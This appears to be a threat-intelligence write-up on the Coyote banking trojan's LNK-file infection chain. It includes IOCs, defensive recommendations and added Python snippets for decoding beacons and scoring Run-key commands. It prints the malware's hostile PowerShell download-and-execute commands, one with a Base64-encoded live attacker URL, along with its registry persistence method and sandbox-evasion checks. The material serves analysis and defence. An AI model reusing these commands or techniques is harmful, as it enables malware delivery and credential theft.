How Coyote Banking Malware Uses LNK Files to Attack 1,000+ Websites and 70+ Banks

A very sophisticated malware attack, currently making waves in the information security community, was recently discovered by FortiGuard Labs. This attack targets Windows computer users in Brazil and is part of a campaign delivering malicious banking software called Coyote. The attack campaign uses LNK files containing PowerShell commands designed to execute malicious scripts and connect to remote servers. Once executed, this malware can perform actions like taking screenshots, displaying phishing overlays to steal sensitive credentials, and keylogging.

The attack process

According to research by FortiGuard Labs, first, the LNK shortcut file with suspicious parameters in the "Target" field will execute and run a PowerShell command to connect to a remote server. The command is as follows:

-w hid -noni -ep Bypass -c Start-Job -Name PSSGR -ScriptBlock { IEX (iwr -Uri 'hxxps://tbet[.]geontrigame[.]com/zxchzzmism' -UseBasicParsing).Content }; Start-Sleep 131

After execution, the victim's machine connects to the remote server (tbet[.]geontrigame[.]com), downloads additional payloads and executes them. Researchers analyzed several LNK files and found a range of URLs of the same form in the argument field.


The content in the downloaded PowerShell script contains 2 encoded data segments as follows:

Figure 3: PowerShell script

After being decoded, the code will be injected into memory using Windows API functions like VirtualAllocEx and WriteProcessMemory. This process is carried out by a DLL loader (bmwiMcDec) to inject the payload npuGDec.

After that, the malware establishes persistence by modifying the Windows Registry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run. It first checks whether this key already holds a PowerShell command; if so, it deletes that value and creates a new one with a random name. The new value holds a PowerShell command that decodes a Base64-encoded URL and then downloads and executes the script behind it, which contains the main functions of the Coyote malware. Decoded, the URL is:

hxxps://yezh[.]geontrigame[.]com/vxewhcacbfqnsw

Figure 6: Registry's setting

If the machine is a new target, the malware collects information about it, such as the device name, username and operating system details, and sends it to the attacker's server. It also looks for installed antivirus products by querying the SecurityCenter2 namespace in Windows Management Instrumentation (WMI). The collected fields are joined with the "|" symbol, Base64-encoded and then reversed. The resulting string is added as a query parameter and sent to the command-and-control server, as in the following example URL:

hxxps://yezh[.]geontrigame[.]com/hqizjs/?l=y4CMuADfvJHUgATMgM3dvRmbpdFI0Z2bz9mcjlWT8JXZk5WZmVGRgM3dvRmbpdFfzlmcoNEf0IDR0Ul(omit)
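As an added example (not code from the report or from FPT), the following Python helper reverses the transformation described above so an analyst can read the fields out of a captured beacon URL. The sample fields and their order are constructed assumptions; the report only gives the separator and the encoding steps.

```python
import base64
from urllib.parse import urlsplit

# Constructed sample fields (not taken from the report); the field order is
# an assumption, the report only states that device name, username, OS
# details and AV products are joined with "|", Base64-encoded and reversed.
SAMPLE_FIELDS = ["DESKTOP-LAB01", "analyst", "Microsoft Windows 10 Pro", "Windows Defender"]


def encode_beacon(fields):
    """Apply the reported encoding (join, Base64, reverse) to build test input."""
    joined = "|".join(fields).encode("utf-8")
    return base64.b64encode(joined).decode("ascii")[::-1]


def decode_beacon(value):
    """Undo the encoding: reverse, Base64-decode, split on '|'.

    Returns None when the value does not decode to printable text that
    contains the separator, so unrelated query values are not misreported.
    """
    candidate = value[::-1]
    candidate += "=" * (-len(candidate) % 4)  # restore padding if it was stripped
    try:
        text = base64.b64decode(candidate, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    if "|" not in text or not text.isprintable():
        return None
    return text.split("|")


def triage_beacon_url(url):
    """Pull the 'l' parameter out of a beacon URL and decode it.

    The query is split by hand rather than with parse_qs, because parse_qs
    would turn '+' (a valid Base64 character) into a space.
    """
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        if key == "l":
            return decode_beacon(value)
    return None


if __name__ == "__main__":
    sample = "https://c2.example.invalid/hqizjs/?l=" + encode_beacon(SAMPLE_FIELDS)
    print(triage_beacon_url(sample))  # the four constructed fields
```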

Once the setup and checks are complete, the malware calls CreateProcess to run the PowerShell command it just added to the Registry:

powershell -w hid -noni -ep Bypass -c $w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly95ZXpoLmdlb250cmlnYW1lLmNvbS92eGV3aGNhY2JmcW5zdw=='));IEX $w.DownloadString($u)

The payload this command downloads is similar to the one fetched by the LNK file, but larger, because it contains the main part of the Coyote malware.
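As an added example (not the report's or FPT's own code), this Python snippet triages a Run-key value of the shape shown above: it flags the launch switches, decodes the FromBase64String literal and returns the embedded URL defanged. The scoring threshold is an assumption chosen for illustration.

```python
import base64
import re

# The command line the report shows being written to the Run key; the
# Base64 literal is exactly as the report gives it.
SAMPLE_RUN_VALUE = (
    "powershell -w hid -noni -ep Bypass -c $w=New-Object Net.WebClient;"
    "$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("
    "'aHR0cHM6Ly95ZXpoLmdlb250cmlnYW1lLmNvbS92eGV3aGNhY2JmcW5zdw=='));"
    "IEX $w.DownloadString($u)"
)

# Launch switches and download/execute primitives the report describes
SUSPICIOUS_FLAGS = ("-w hid", "-noni", "-ep bypass")
DOWNLOAD_EXEC = ("downloadstring", "invoke-webrequest", "iwr ", "invoke-expression", "iex ")
B64_LITERAL = re.compile(r"FromBase64String\(\s*'([A-Za-z0-9+/=]+)'\s*\)", re.IGNORECASE)


def defang(url):
    """Render a URL so it cannot be clicked by accident in a report."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def decode_b64_literals(command):
    """Decode every FromBase64String('...') literal that holds UTF-8 text."""
    found = []
    for literal in B64_LITERAL.findall(command):
        try:
            found.append(base64.b64decode(literal, validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue  # binary blob or malformed literal, not readable text
    return found


def triage_run_value(command):
    """Score a Run-key command line and surface any embedded URL, defanged."""
    lowered = command.lower()
    flags = [f for f in SUSPICIOUS_FLAGS if f in lowered]
    primitives = [p for p in DOWNLOAD_EXEC if p in lowered]
    urls = [defang(u) for u in decode_b64_literals(command)
            if u.lower().startswith(("http://", "https://"))]
    # Assumed weighting: each switch 1, any download primitive 1, decoded URL 2
    score = len(flags) + min(len(primitives), 1) + (2 if urls else 0)
    return {"flags": flags, "primitives": primitives, "urls": urls, "suspicious": score >= 3}
```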

After decoding, the payload above has the following functions:

  • Check the username. The malware compares it against test or sandbox names such as Johnson, Miller, maltest, Sandbox and John Doe.

  • Check the environment for virtual-machine artifacts. It looks in C:\Windows\System32 for names containing qemu-ga, qemuwmi, balloon.sys, netkvm.sys, vioinput, viofs.sys and vioser.sys.

  • Build a target list: The Coyote malware expands the target list to include 1,030 websites and 73 financial enterprises.

  • Connect to the C2 server: Coyote keeps monitoring the active device to detect whether the victim connects to one of the targets. When a connection to a target is seen, it reports to the C2 server over port 443. The C2 servers are geraatualiza[.]com, masterdow[.]com and geraupdate[.]com. Depending on the response from the C2 server, the malware performs actions such as viewing, taking screenshots, clicking the mouse, running a keylogger, shutting down the device, etc.

The attack chain of the Coyote malware is as follows:

IOC

  1. Host

    • geraatualiza[.]com

    • masterdow[.]com

    • geraupdate[.]com

Recommendation

Given the complexity and sophistication of these attack methods, FPT Threat Intelligence makes the following recommendations:

  • Regularly update antivirus software to detect and block the latest malware

  • Keep detection tooling updated with the IOCs related to this malware

  • Do not open strange or suspicious files

  • Implement monitoring measures to detect unusual activities and behaviors on endpoints, such as EDR, XDR, etc.

Reference

  1. Coyote Banking Trojan: A Stealthy Attack via LNK Files | FortiGuard Labs

  2. Coyote Malware Expands Reach: Now Targets 1,030 Sites and 73 Financial Institutions

  3. Coyote Banking Malware Weaponizing Windows LNK Files To Execute Malicious Scripts
